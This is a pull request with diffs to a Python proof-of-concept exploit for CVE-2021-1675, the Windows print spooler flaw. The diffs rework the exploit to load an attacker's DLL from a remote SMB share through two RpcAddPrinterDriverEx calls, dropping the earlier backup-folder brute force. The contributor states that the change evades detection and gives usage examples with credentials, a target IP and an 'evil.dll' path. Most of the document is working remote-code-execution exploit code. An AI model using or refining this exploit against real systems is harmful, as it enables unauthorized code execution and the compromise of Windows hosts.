### PR TITLE
Exploit with no backup folder bruteforce

### DIFF
--- a/CVE-2021-1675.py
+++ b/CVE-2021-1675.py
@@ -84,18 +84,14 @@ def main(dce, pDriverPath, share, handle=NULL):
     resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
     print("[*] Stage0: {0}".format(resp['ErrorCode']))
 
-    container_info['DriverInfo']['Level2']['pConfigFile']  = "C:\\Windows\\System32\\kernelbase.dll\x00"
-    for i in range(1, 30):
-        try:
-            container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
-            resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
-            print("[*] Stage{0}: {1}".format(i, resp['ErrorCode']))
-            if (resp['ErrorCode'] == 0):
-                print("[+] Exploit Completed")
-                sys.exit()
-        except Exception as e:
-            #print(e)
-            pass
+    # Just ask for a new driver with already installed files
+    container_info['DriverInfo']['Level2']['pConfigFile']  = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename)
+    flags = rprn.APD_COPY_NEW_FILES | 0x10 | 0x8000
+    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
+    
+    print("[*] Stage1: {0}".format(resp['ErrorCode']))
+    if (resp['ErrorCode'] == 0):
+        print("[+] Exploit Completed")
 
 
 if __name__ == '__main__':

--- a/CVE-2021-1675.py
+++ b/CVE-2021-1675.py
@@ -66,13 +66,13 @@ def getDrivers(dce, handle=NULL):
     return blob
 
 
-def main(dce, pDriverPath, name, share, handle=NULL):
+def main(dce, pDriverPath, driverName, share, handle=NULL):
     #build DRIVER_CONTAINER package
     container_info = rprn.DRIVER_CONTAINER()
     container_info['Level'] = 2
     container_info['DriverInfo']['tag'] = 2
     container_info['DriverInfo']['Level2']['cVersion']     = 3
-    container_info['DriverInfo']['Level2']['pName']        = "{0}0\x00".format(name)
+    container_info['DriverInfo']['Level2']['pName']        = "{0}0\x00".format(driverName)
     container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
     container_info['DriverInfo']['Level2']['pDriverPath']  = pDriverPath + '\x00'
     container_info['DriverInfo']['Level2']['pDataFile']    = "{0}\x00".format(share)
@@ -85,7 +85,7 @@ def main(dce, pDriverPath, name, share, handle=NULL):
     print("[*] Stage0: {0}".format(resp['ErrorCode']))
 
     # Just ask for a new driver with already installed files
-    container_info['DriverInfo']['Level2']['pName']        = "{0}1\x00".format(name)
+    container_info['DriverInfo']['Level2']['pName']        = "{0}1\x00".format(driverName)
     container_info['DriverInfo']['Level2']['pConfigFile']  = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename)
     flags = rprn.APD_COPY_NEW_FILES | 0x10 | 0x8000
     resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
@@ -102,7 +102,7 @@ Example;
 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'
     """)
     parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
-    parser.add_argument('name', action='store', help='name of driver [need to be unique on target]')
+    parser.add_argument('driverName', action='store', help='name of driver [need to be unique on target]')
     parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'')
     parser.add_argument('pDriverPath', action='store', help='Driver path. Example \'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\'', nargs="?")
     group = parser.add_argument_group('authentication')
@@ -168,4 +168,4 @@ Example;
 
     print("[+] pDriverPath Found {0}".format(pDriverPath))
     print("[*] Executing {0}".format(options.share))
-    main(dce, pDriverPath, options.name, options.share)
+    main(dce, pDriverPath, options.driverName, options.share)

--- a/CVE-2021-1675.py
+++ b/CVE-2021-1675.py
@@ -66,13 +66,13 @@ def getDrivers(dce, handle=NULL):
     return blob
 
 
-def main(dce, pDriverPath, share, handle=NULL):
+def main(dce, pDriverPath, name, share, handle=NULL):
     #build DRIVER_CONTAINER package
     container_info = rprn.DRIVER_CONTAINER()
     container_info['Level'] = 2
     container_info['DriverInfo']['tag'] = 2
     container_info['DriverInfo']['Level2']['cVersion']     = 3
-    container_info['DriverInfo']['Level2']['pName']        = "Stage0\x00"
+    container_info['DriverInfo']['Level2']['pName']        = "{0}0\x00".format(name)
     container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
     container_info['DriverInfo']['Level2']['pDriverPath']  = pDriverPath + '\x00'
     container_info['DriverInfo']['Level2']['pDataFile']    = "{0}\x00".format(share)
@@ -85,7 +85,7 @@ def main(dce, pDriverPath, share, handle=NULL):
     print("[*] Stage0: {0}".format(resp['ErrorCode']))
 
     # Just ask for a new driver with already installed files
-    container_info['DriverInfo']['Level2']['pName']        = "Stage1\x00"
+    container_info['DriverInfo']['Level2']['pName']        = "{0}1\x00".format(name)
     container_info['DriverInfo']['Level2']['pConfigFile']  = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename)
     flags = rprn.APD_COPY_NEW_FILES | 0x10 | 0x8000
     resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
@@ -102,6 +102,7 @@ Example;
 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'
     """)
     parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
+    parser.add_argument('name', action='store', help='name of driver [need to be unique on target]')
     parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'')
     parser.add_argument('pDriverPath', action='store', help='Driver path. Example \'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\'', nargs="?")
     group = parser.add_argument_group('authentication')
@@ -167,4 +168,4 @@ Example;
 
     print("[+] pDriverPath Found {0}".format(pDriverPath))
     print("[*] Executing {0}".format(options.share))
-    main(dce, pDriverPath, options.share)
+    main(dce, pDriverPath, options.name, options.share)

--- a/CVE-2021-1675.py
+++ b/CVE-2021-1675.py
@@ -72,7 +72,7 @@ def main(dce, pDriverPath, share, handle=NULL):
     container_info['Level'] = 2
     container_info['DriverInfo']['tag'] = 2
     container_info['DriverInfo']['Level2']['cVersion']     = 3
-    container_info['DriverInfo']['Level2']['pName']        = "1234\x00"
+    container_info['DriverInfo']['Level2']['pName']        = "Stage0\x00"
     container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
     container_info['DriverInfo']['Level2']['pDriverPath']  = pDriverPath + '\x00'
     container_info['DriverInfo']['Level2']['pDataFile']    = "{0}\x00".format(share)
@@ -85,6 +85,7 @@ def main(dce, pDriverPath, share, handle=NULL):
     print("[*] Stage0: {0}".format(resp['ErrorCode']))
 
     # Just ask for a new driver with already installed files
+    container_info['DriverInfo']['Level2']['pName']        = "Stage1\x00"
     container_info['DriverInfo']['Level2']['pConfigFile']  = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename)
     flags = rprn.APD_COPY_NEW_FILES | 0x10 | 0x8000
     resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)

--- a/CVE-2021-1675.py
+++ b/CVE-2021-1675.py
@@ -166,11 +166,4 @@ Example;
 
     print("[+] pDriverPath Found {0}".format(pDriverPath))
     print("[*] Executing {0}".format(options.share))
-
-    #re-run if stage0/stageX fails
-    print("[*] Try 1...")
     main(dce, pDriverPath, options.share)
-    print("[*] Try 2...")
-    main(dce, pDriverPath,options.share)
-    print("[*] Try 3...")
-    main(dce, pDriverPath,options.share)


### PR DESCRIPTION
Hello, 
Thanks for your work. I'm always interesting to understand exploit to better detect it.

I found a way to exploit it without the backup bruteforce, and disable detection on it.
First call using `RpcAddPrinterDriverEx ` for upload the malicious dll with APD_COPY_ALL_FILES flag and a second stage always using `RpcAddPrinterDriverEx ` using APD_COPY_NEW_FILES flag but with a different name, and keep the evil dll path under `C:\Windows\System32\spool\drivers\x64\3\`.

On my test lab i was unabel to exploit because backup folder are always cleanup properly, so here a solution.

Have a nice day,
